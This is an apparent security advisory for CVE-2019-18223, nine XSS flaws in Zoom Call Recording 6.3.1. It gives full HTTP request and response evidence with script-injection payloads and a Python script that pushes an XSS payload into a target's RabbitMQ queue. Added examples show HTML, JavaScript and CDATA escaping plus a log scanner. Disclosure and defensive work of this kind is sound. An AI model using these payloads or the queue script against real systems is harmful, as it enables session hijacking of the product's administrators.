CVE-2019-18223-XSS-ZoomCallRecording

Zoom Call Recording 6.3.1 from ZOOM International suffers from multiple XSS vulnerabilities via:

  • the phoneNumber field in the (1) User Edit or (2) User Add form
  • (3) the name field in the Role Add form
  • (4) the name or number field in the Edit Group form
  • (5) the tagKey or tagValue field in the Recording Rules Configuration
  • (6) the txt_69735:/VemailAddress/value or txt_75767:/VemailFrom/value field in callrec/config
  • (7) the selectedMenuId field in callrec/config
  • (8) the xmlPath field in callrec/config
  • (9) escaping the textarea in callrec/logs_view.jsp

Evidence

XSS(1) - Stored XSS in “/callrec/userEditAction.do” page

Request:

POST /callrec/userEditAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_edit.jsp?userId=5&roleId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
Cookie: JSESSIONID=0724AC780C8C2535253EFD6ADBB16E55
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=10a6ccd1d842ac1ff64bc645fd053ea8&login2=XXXXXX&firstName=xxx+-+xxxxxx&lastName=xxxxx&email=xxx-xxxxxxx.xxx%40xxx.ro&phoneNumber=<script>alert('XSS')</script>&ldapUser=on&roleId=3&viewRoleId=&loginOriginal=XXXXXX&roleIdOriginal=3&ldapUserOriginal=LDAP&phoneNumberOriginal=&userId=5&ldapOriginal=true

Response:

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 08:09:16 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 9959
Connection: close

***TRUNCATED***
            <img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
            
              </a>
            
          </td>
          <td class="left soft_wrap">
            Marin
          </td>
          <td class="left soft_wrap">
              XXX - XXXXXXXX
          </td>
          <td class="number wrap">
              <script>alert('XSS');</script>
          </td>
          
            <td style="text-align:center;">
              <img src="images/icon-check.png" alt=""/>
***TRUNCATED***

XSS(2) - Stored XSS in “/callrec/userAddAction.do” page

Request:

POST /callrec/userAddAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_add.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&roleId=8&viewRoleId=8&dispatch=addUser&groupLdapUsers=&login2=TTTTTTTTTTTTTT&password2=Qwerty1234&passwordVerify=Qwerty1234&firstName=qqqqqqqqqqq&lastName=bbbbbbbbbb&email=&phoneNumber=<script>alert("XSSNumber")</script>&value%28filter_1%29=-1&value%28conj_1%29=END

Response:

HTTP/1.1 200 OK
Date: Mon, 21 Oct 2019 08:45:17 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 10957
Connection: close

***TRUNCATED***
            <img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
            
              </a>
            
          </td>
          <td class="left soft_wrap">
            Marin
          </td>
          <td class="left soft_wrap">
              XXX - XXXXXXXXX
          </td>
          <td class="number wrap">
              <script>alert('XSS');</script>
          </td>
          
            <td style="text-align:center;">
              <img src="images/icon-check.png" alt=""/>
***TRUNCATED***

XSS(3) - Stored XSS in “/callrec/roleAddAction.do” page

Request:

POST /callrec/roleAddAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/roleAddAction.do
Content-Type: application/x-www-form-urlencoded
Content-Length: 385
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&dispatch=add&viewRoleId=3&name=<script>alert("XSSName")</script>&roleParentId=3&number=bbbbbbbbbbbbb&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END

XSS(4) - Stored XSS in “/callrec/roleEditAction.do” page

Request:

POST /callrec/roleEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/group_edit.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 451
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&originalName=%3Cscript%3Ealert%28%22XSSName%22%29%3C%2Fscript%3E&roleId=8&name=<script>alert("XSSName")</script>&parentId=3&number=<script>alert("XSSNumber")</script>&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END

XSS(5) - Stored XSS in “/callrec/recRulesEditAction.do” page

Request:

POST /callrec/recRulesEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/recording_rules_edit.jsp?viewRoleId=1&ruleId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Cookie: scroolY=0; JSESSIONID=BDFA58A8B635ED02BFDEE14CCFCD6104; m=
Connection: close
Upgrade-Insecure-Requests: 1

org.apache.struts.taglib.html.TOKEN=6188a4d2a8a71e769b9f3137585246d0&ruleId=1&roleId=1&policy=RECORD&typeRule=PHONE&mask=7561&probability=100&dayOfWeek=1&dayOfWeek=2&dayOfWeek=3&dayOfWeek=4&dayOfWeek=5&dayOfWeek=6&dayOfWeek=7&timeFrom=00%3A00&timeTo=24%3A00&active=on&screenRECProbability=100&addTag=on&tagKey="><script>alert('XSSTagKey')</script><&tagValue="><script>alert('XSSTagValue')</script><

XSS(6) - Stored XSS in “/callrec/config” page

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=tools&selectedMenuId=menu_tools&selectedMenuOption=config/specified/tools/cz_zoom_callrec_tools_disk_space/view.jsp&specifiedConfiguration=disk_space
Content-type: application/x-www-form-urlencoded
Content-Length: 202
Cookie: scroolY=0; JSESSIONID=2C0E0A265B23D61CFC97E49068370C2F; m=
Connection: close

action=save&chb_69733:/VenabledEmail/value=false&chb_69734:/VenabledSNMP/value=false&txt_69735:/VemailAddress/value=asdsaddasdsadd"><script>alert('XSS')</script><&txt_69736:/VdaysLeftWhenNotify/value=20

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=core&selectedMenuId=menu_core&selectedMenuOption=config/specified/core/cz_zoom_callrec_core_callstorage/view.jsp&specifiedConfiguration=smtp
Content-type: application/x-www-form-urlencoded
Content-Length: 157
Cookie: scroolY=0; JSESSIONID=712211C38CA7012B06C10BB1933D5B67; m=
Connection: close

action=save&txt_75766:/VsmtpAddress/value=127.0.0.1&txt_75767:/VemailFrom/value=callrec%40xxxxx.xxxxxxx.xxxxxx"><script>alert("SMTPConf")</script><
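XSS(1) to XSS(6) share one root cause: a stored value (phoneNumber, name, number, tagKey, tagValue, the config text fields) is concatenated into the page without output encoding, either into an element body such as the `<td class="number wrap">` cell shown above or into a `value="..."` attribute, which the `"><script>` payloads of XSS(5) and XSS(6) close. The following is an added example, not code from the disclosure or from the Zoom Call Recording product, that renders the disclosed payloads both the vulnerable way and with context-appropriate HTML escaping, and checks which rendering still contains a live script tag. The field set and the `render_*` helpers are constructed for illustration.

```python
import html
import re

# Constructed sample of stored field values, modelled on the payloads in the
# disclosure: phoneNumber from XSS(1)/(2), tagKey from XSS(5), the
# emailAddress text field from XSS(6), plus one benign value that must
# survive escaping unchanged in meaning.
STORED_FIELDS = {
    "phoneNumber": "<script>alert('XSS')</script>",
    "tagKey": "\"><script>alert('XSSTagKey')</script><",
    "emailAddress": "asdsaddasdsadd\"><script>alert('XSS')</script><",
    "lastName": "O'Brien & Co",
}

# A real (unescaped) script tag; the escaped form &lt;script&gt; does not match.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_cell_unsafe(value: str) -> str:
    """Vulnerable pattern: the stored value is dropped into the element body
    exactly as the Evidence shows in <td class="number wrap">."""
    return '<td class="number wrap">%s</td>' % value


def render_cell(value: str) -> str:
    """Hardened: escape for the element-body context (< > & are enough here)."""
    return '<td class="number wrap">%s</td>' % html.escape(value, quote=False)


def render_input_unsafe(name: str, value: str) -> str:
    """Vulnerable pattern for the edit forms: a value="..." attribute built by
    concatenation, which a leading "> terminates."""
    return '<input type="text" name="%s" value="%s">' % (name, value)


def render_input(name: str, value: str) -> str:
    """Hardened: quote=True additionally encodes " and ' so the value cannot
    terminate the attribute it sits in."""
    return '<input type="text" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def contains_live_script(markup: str) -> bool:
    """True if the rendered fragment still contains an unescaped <script tag."""
    return SCRIPT_TAG.search(markup) is not None


def audit(fields=STORED_FIELDS):
    """Renders every stored value both ways; returns
    {field: (unsafe_rendering_has_script, escaped_rendering_has_script)}."""
    report = {}
    for name, value in fields.items():
        unsafe = render_cell_unsafe(value) + render_input_unsafe(name, value)
        safe = render_cell(value) + render_input(name, value)
        report[name] = (contains_live_script(unsafe), contains_live_script(safe))
    return report


if __name__ == "__main__":
    for name, (unsafe, safe) in audit().items():
        print("%-13s unsafe rendering executes: %-5s  escaped rendering executes: %s"
              % (name, unsafe, safe))
```

The benign `lastName` value shows the escaping is lossless: the browser decodes `&amp;` back to `&` when displaying the cell, so user data is preserved while markup characters never reach the parser as syntax. On a Struts/JSP stack the equivalent is using `<c:out>` or `<bean:write filter="true">` instead of raw scriptlet output.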

XSS(7) - Reflected XSS in “/callrec/config” page via direct JS injection

Request:

GET /callrec/config.jsp?selectedModule=drivers&selectedMenuId='-alert('selectedMenuId')-'&selectedMenuOption=config/specified/drivers/cz_zoom_callrec_driver_genesys/view.jsp&specifiedConfiguration=genesysDriver HTTP/1.1
Host: xxx.xxxxxxx.net
Cookie: JSESSIONID=4D***TRUNCATED***39

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:13:10 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 24468

***TRUNCATED***

/** Show the menu for the selected module.  **/
function showSelectedModuleMenu() {
    var menuId = ''-alert('selectedMenuId')-'';
    setMenuContent(menuId);
    document.getElementById("drivers").className = "selected";
}
</script>

***TRUNCATED***
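XSS(7) is a different output context from the stored cases: `selectedMenuId` lands inside a JavaScript string literal in a `<script>` block, so the payload needs no angle brackets at all, just a quote to close the literal. HTML escaping is the wrong tool there; the value has to be encoded as a JS string literal, and since menu identifiers are a fixed set, an allowlist check belongs in front of the encoding. The block below is an added example, not code from the disclosure or the product: `KNOWN_MENU_IDS` is an assumed allowlist built from the two menu identifiers visible in the Referer headers above, and `value_escapes_literal` is a small constructed scanner that reports whether the rendered statement still consists of exactly one string literal followed by `;`.

```python
import json
import re

# Assumed allowlist of menu identifiers; only menu_core and menu_tools are
# visible in the disclosure, a real deployment would list all of its menus.
KNOWN_MENU_IDS = {"menu_core", "menu_tools"}

# Reflected value from XSS(7).
PAYLOAD = "'-alert('selectedMenuId')-'"


def js_string_literal(value: str) -> str:
    """Encodes value as a double-quoted JavaScript string literal that is also
    safe inside an HTML <script> block. json.dumps escapes quotes, backslashes,
    control characters and (with ensure_ascii) the U+2028/U+2029 line
    terminators; '<', '>' and '&' are then \\uXXXX-escaped so a value such as
    '</script>' cannot close the surrounding script element."""
    literal = json.dumps(value, ensure_ascii=True)
    return re.sub(r"[<>&]", lambda m: "\\u%04x" % ord(m.group(0)), literal)


def render_menu_script_unsafe(menu_id: str) -> str:
    """Vulnerable pattern from the response above: raw value in a '...' literal."""
    return "var menuId = '%s';" % menu_id


def render_menu_script_encoded(menu_id: str) -> str:
    """Encoding only: the value stays inside the literal whatever it contains."""
    return "var menuId = %s;" % js_string_literal(menu_id)


def render_menu_script(menu_id: str) -> str:
    """Defence in depth: reject unknown identifiers, then encode the known one."""
    if menu_id not in KNOWN_MENU_IDS:
        raise ValueError("unknown selectedMenuId: %r" % menu_id)
    return render_menu_script_encoded(menu_id)


def value_escapes_literal(statement: str) -> bool:
    """Scans 'var menuId = <literal>;' with JS string rules (backslash escapes
    the next character) and returns True if anything other than the closing
    ';' follows the literal, i.e. the injected value broke out of it."""
    prefix = "var menuId = "
    if not statement.startswith(prefix):
        raise ValueError("unexpected statement shape")
    body = statement[len(prefix):]
    quote = body[0]
    i = 1
    while i < len(body):
        if body[i] == "\\":
            i += 2
            continue
        if body[i] == quote:
            return body[i + 1:] != ";"
        i += 1
    return True  # unterminated literal: also broken


if __name__ == "__main__":
    for label, stmt in (("unsafe", render_menu_script_unsafe(PAYLOAD)),
                        ("encoded", render_menu_script_encoded(PAYLOAD))):
        print("%-8s %s  -> breaks out: %s" % (label, stmt, value_escapes_literal(stmt)))
```

The same statement shape with the benign value `menu_core` is fine in both renderings, which is why the bug went unnoticed: the template only fails when the data contains a quote. In JSP the encoded form corresponds to emitting the value through a JavaScript encoder (for example OWASP Java Encoder's `Encode.forJavaScript`) rather than `<%= request.getParameter("selectedMenuId") %>`.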

XSS(8) - Reflected XSS in “/callrec/config” page via XML Script Element

Request:

POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
Content-type: application/x-www-form-urlencoded
Content-Length: 137
Cookie: JSESSIONID=4D***TRUNCATED***39

action=removeEntry&xmlPath=/Eserver/aaa/]]><script+xmlns="http://www.w3.org/1999/xhtml"><![CDATA[+alert('xmlPath');+]]></script><![CDATA[

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:23:41 GMT
Server: Apache
Content-Type: text/xml;charset=utf-8
Content-Length: 1702
Vary: Accept-Encoding

<?xml version="1.0"?>
<root>
<action>forward</action>
<resultType>error</resultType>
<message><![CDATA[<h1 style="font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px">AJAX Config Servlet Error</h1><HR size="1" noshade="noshade"><p><b>Message: </b><u>Removing object operation failed.</u></p><p><b>Exception: </b><pre>java.lang.IllegalAccessException: XmlPath is invalid (/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml"><![CDATA[ alert('xmlPath'); ]]></script><![CDATA[). Error is at "aaa" element. Cause: Equal group not found. Specification is not number and equal group with this name does not exist.

***TRUNCATED***
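XSS(8) shows a third context: the servlet wraps its error text in a CDATA section, and the `xmlPath` value is echoed into that text, so the one sequence that terminates CDATA, `]]>`, lets the value start real XML markup (the `<script xmlns="http://www.w3.org/1999/xhtml">` element in the response). The usual fix is to split every `]]>` in untrusted text across two CDATA sections. The block below is an added example, not the product's code: `TEMPLATE` is a constructed stand-in for the `<root>` response above, and `inspect_message` parses the result to show that the naive embedding yields a child element inside `<message>` while the escaped embedding yields only text that round-trips to the original value.

```python
import xml.etree.ElementTree as ET

# xmlPath value from XSS(8) as the servlet received it (URL-decoded).
XMLPATH_PAYLOAD = ('/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml">'
                   "<![CDATA[ alert('xmlPath'); ]]></script><![CDATA[")

# Constructed stand-in for the servlet's error response; %s is where the
# untrusted xmlPath is interpolated into the CDATA-wrapped message.
TEMPLATE = ('<?xml version="1.0"?><root><action>forward</action>'
            '<resultType>error</resultType>'
            '<message><![CDATA[XmlPath is invalid (%s).]]></message></root>')


def cdata_escape(text: str) -> str:
    """Makes text safe inside a CDATA section. Only ']]>' can end CDATA, so
    that sequence is split across two sections: ']]' ends the first,
    '><![CDATA[' reopens, and the '>' becomes the start of the next.
    Every other character, including '<' and '&', is literal in CDATA."""
    return text.replace("]]>", "]]]]><![CDATA[>")


def build_error_response_unsafe(xml_path: str) -> str:
    """Vulnerable pattern: the value is concatenated into the CDATA text."""
    return TEMPLATE % xml_path


def build_error_response(xml_path: str) -> str:
    """Hardened: the value is CDATA-escaped before concatenation."""
    return TEMPLATE % cdata_escape(xml_path)


def inspect_message(xml_doc: str):
    """Parses the response and returns (text before the first child element,
    number of child elements) of <message>. Any child element means
    attacker-controlled text was parsed as markup."""
    root = ET.fromstring(xml_doc)
    msg = root.find("message")
    return msg.text or "", len(list(msg))


if __name__ == "__main__":
    for label, doc in (("unsafe", build_error_response_unsafe(XMLPATH_PAYLOAD)),
                       ("escaped", build_error_response(XMLPATH_PAYLOAD))):
        text, children = inspect_message(doc)
        print("%-8s child elements in <message>: %d  text: %r" % (label, children, text))
```

Note that both documents are well-formed XML, so a parser error is not a usable signal; the check has to be structural (is there markup where only text should be) or, better, avoided altogether by building the response with an XML library that serialises text nodes rather than by string concatenation.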

XSS(9) - Stored XSS in “/callrec/logs_view.jsp” page via RabbitMQ

The textarea in which Zoom Call Recording displays its AMQP log messages does not encode the logged message body, so a message published to the RabbitMQ component that contains `</textarea>` closes the element, and any HTML/JS that follows it in the message is rendered and executed in the browser of whoever views the log.

Python script for sending XSS payload via AMQP:

```python
#!/usr/bin/python

import pika, os, logging, sys
logging.basicConfig()

# Command line: <username> <password> <target_ip> <queue name>
username = sys.argv[1]
password = sys.argv[2]
target_ip = sys.argv[3]
queueName = sys.argv[4]

# AMQP URL for the default vhost ("/" encoded as %2f); the "Test" environment
# variable, if set, overrides it.
url = os.environ.get("Test", 'amqp://%s:%s@%s/' % (username, password, target_ip) + '%2f')
params = pika.URLParameters(url)
params.socket_timeout = 5

xss = "</textarea><script>alert('index_frame.jsp - Log Textarea')</script>"

# Publish the message body to the queue via the default exchange.
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key=queueName, body=xss)
print ("[x] "+xss+" sent to consumer")
connection.close()
```

Request:

POST /callrec/logs_view.jsp HTTP/1.1
Host: xxx.xxxxx.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: JSESSIONID=69***TRUNCATED***61

selLogIdx=28&page=0

Response:

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:33:47 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 37074

***TRUNCATED***

                <textarea id="copytext">
                    fa329ff3700] ucl.threads.BoostThread - Thread process threw error: Opening TCP socket to [amqp://<IP>:5672]: a socket error occurred
Oct 24 10:11:31 ERROR [0x7fa3297f2700] ucl.threads.BoostThread - Thread process threw 

***TRUNCATED***

Oct 24 15:17:44 WARN  [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:</textarea><script>alert('index_frame.jsp - Log Textarea')</script>}

                </textarea>
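XSS(9) differs from the other eight in that the injection source is not an HTTP parameter but the AMQP bus: anything a producer on the RabbitMQ side can write ends up verbatim in the log viewer. The rendering-side fix is the same HTML escaping of the message text before it is placed in the textarea; the block below instead shows the monitoring side, which is useful while an unpatched 6.3.1 is still in service. It is an added example, not code from the disclosure or the product. The log lines are constructed to match the `AmqpMessage{...,payload:...}` format visible in the textarea above, and the `AMQP_PAYLOAD` and `HTML_TAG` patterns are assumptions about that format, not something the vendor documents.

```python
import re

# Constructed log excerpt modelled on the logs_view.jsp content shown above:
# a connection error (no AMQP payload), a benign malformed message, and the
# textarea-escape payload from XSS(9).
SAMPLE_LOG = """\
Oct 24 10:11:31 ERROR [0x7fa3297f2700] ucl.threads.BoostThread - Thread process threw error: Opening TCP socket to [amqp://<IP>:5672]: a socket error occurred
Oct 24 15:17:40 WARN  [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:{"call_id":"1234"}}
Oct 24 15:17:44 WARN  [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:</textarea><script>alert('index_frame.jsp - Log Textarea')</script>}
"""

# Assumed shape of the logged message: the payload runs from "payload:" to the
# closing brace of AmqpMessage{...} at the end of the line.
AMQP_PAYLOAD = re.compile(r"AmqpMessage\{.*?payload:(?P<payload>.*)\}\s*$")

# Anything that looks like an HTML start or end tag. Legitimate recording
# messages are structured data and should never contain tag syntax.
HTML_TAG = re.compile(r"</?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def extract_payload(line: str):
    """Returns the AMQP payload logged on this line, or None if the line does
    not log an AmqpMessage (so '<IP>' in a socket error is never inspected)."""
    m = AMQP_PAYLOAD.search(line)
    return m.group("payload") if m else None


def is_suspicious(payload: str) -> bool:
    """True if the payload contains HTML tag syntax."""
    return HTML_TAG.search(payload) is not None


def scan(log_text: str):
    """Returns [(line_number, payload)] for every logged AMQP payload that
    contains tag syntax; each hit is a message the log viewer would render."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        payload = extract_payload(line)
        if payload is not None and is_suspicious(payload):
            hits.append((number, payload))
    return hits


if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print("line %d: markup in AMQP payload: %r" % (number, payload))
```

A hit here also points at the upstream control that matters most for this finding: who is allowed to publish to the recorder's queues. Restricting the RabbitMQ user and vhost permissions so that only the recording components can publish removes the injection source regardless of how the log page renders.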